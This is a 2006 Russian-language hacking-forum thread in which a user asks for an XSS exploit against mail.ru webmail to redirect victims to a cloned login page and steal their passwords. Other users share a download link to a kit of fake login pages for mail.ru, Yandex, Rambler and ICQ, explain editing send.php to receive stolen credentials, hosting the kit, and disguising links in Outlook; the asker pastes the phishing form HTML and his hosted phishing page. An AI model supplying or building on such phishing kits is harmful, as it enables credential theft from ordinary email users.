PDA

Просмотр полной версии : нужна активная XSS в почте mail.ru


qwert125
05.11.2006, 19:30
Подскажите скрипт который можно было бы отправить по мылу при открытии которого жертву перебрасывало бы на мою страничку клон-страницы которую выдает mail.ru ри вводе не правильного пароля
и скрипт для этой странички чтобы заново введеные данные отправлялись мне на мыло
Наверняка кто нибудь такое делал

porter
05.11.2006, 19:49
Врятли тебе такое напишут....
Максимум что ты можешь сделать так это самому такое сварганить либо купить этот скрипт..

qwert125
05.11.2006, 20:19
так зачем же писать,может у кого уже есть готовое?

Undernative
05.11.2006, 21:28
http://dump.ru/files/8/8651969201/

Мои фейковые страница для
-mail.ru
-yandex.ru
-rambler.ru
-ICQ

в файле form.php смени мыло вместо beast-6@*****.ru на свое...и сливай все содержимое на домены holm.ru там лучше всего пашет

А на счет отправки письма используй либо Outlook ,в нем юзай гиперссылку чтобы скрыть ссылку ,либо пиши скрипт,его я не могу тебе написать.Ибо это сделай сам.

nc.STRIEM
05.11.2006, 21:33
так зачем же писать,может у кого уже есть готовое?
Это те нужна активная XSS в почте mail.ru! Такие вещи всегдща есть, но те которые попадают в паблик долго не живут! поэтому кто знает тот молчит! хотя за деньги скажут))

porter
05.11.2006, 23:05
nc.STRIEM сам знаешь?

qwert125
05.11.2006, 23:28
http://dump.ru/files/8/8651969201/

Мои фейковые страница для
-mail.ru
-yandex.ru
-rambler.ru
-ICQ

в файле form.php смени мыло вместо beast-6@*****.ru на свое...и сливай все содержимое на домены holm.ru там лучше всего пашет

А на счет отправки письма используй либо Outlook ,в нем юзай гиперссылку чтобы скрыть ссылку ,либо пиши скрипт,его я не могу тебе написать.Ибо это сделай сам.
че то я в файле form.php не нашел beast-6@*****.ru <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0073)http://lineage2world.jino-net.ru/-%20Lineage2World_com%20-_files/form.php --> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=windows-1251"><LINK href="form.files/dubie.css" type=text/css rel=stylesheet> <META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD> <BODY style="FONT-SIZE: 15px; FONT-FAMILY: Verdna" bgColor=#ffffff leftMargin=0 topMargin=0> <FORM action=send.php method=post> <P>Логин :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <INPUT size=30 name=Name><tr><td class=form width=100%> <td><select size=1 name=Domain class=long tabindex=2> <option value=mail.ru >@mail.ru</option><option value=inbox.ru >@inbox.ru</option><option value=bk.ru >@bk.ru</option><option value=list.ru >@list.ru</option> </select></td> </table> </td> </tr></P> <P>Пароль:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <INPUT type=password size=30 name=Email></P> <BR><BR> <CENTER><INPUT type=submit value=Войти> </CENTER></FORM></BODY></HTML>
а потом, я то залью mail.htm а form.php куда заливать то? :(

Fixer
06.11.2006, 00:29
тебе сюда! http://forum.antichat.ru/threadedpost217073.html#post217073

Undernative
06.11.2006, 00:33
че то я в файле form.php не нашел beast-6@*****.ru
потом, я то залью mail.htm а form.php куда заливать то?
1.CОрри напутал...в файле send.php
2.Допустим папка mail.ru ,все что в ней есть сливай на хост и все

qwert125
06.11.2006, 00:35
За то я нашел в файле send.php beast-6@yandex.ru поменял его на свой и все содержимое папки залил на holm.ru но ни хера не получается,правда я страницу mail.htm свою залил,потому как в твоей три орфографические ошибки,не знаю на сколько это важно...

qwert125
06.11.2006, 00:38
Вот посмотри http://qwert125.h17.ru/mail.htm

Undernative
06.11.2006, 00:42
пиши в ПМ !

qwert125
06.11.2006, 00:51
...а что такое ПМ?

ZikZak
06.11.2006, 01:14
...а что такое ПМ?

Улыбнуло )))
ПМ - это Персональное Сообщение

ENFIX
06.11.2006, 23:42
Вот люди пошли... Xss им нада, а даже не знаю что такое ПМ...
Наверно просто причли, что Xss это круто и с ним все можно :-d

Chumak
06.11.2006, 23:48
Плиз вышлите кто нить в ПМ!!! Пажалуйста!

qwert125
07.11.2006, 14:28
Chumak че выслать то?

Chumak
07.11.2006, 22:05
Активную xss!

Undernative
09.11.2006, 16:36
Активную xss!
:D :D :D

-=lebed=-
09.11.2006, 17:30
http://forum.antichat.ru/showthread.php?t=26862 вот тут все смотрите - свежак рабочий
Можно затестить http://otvet.mail.ru/question/961034/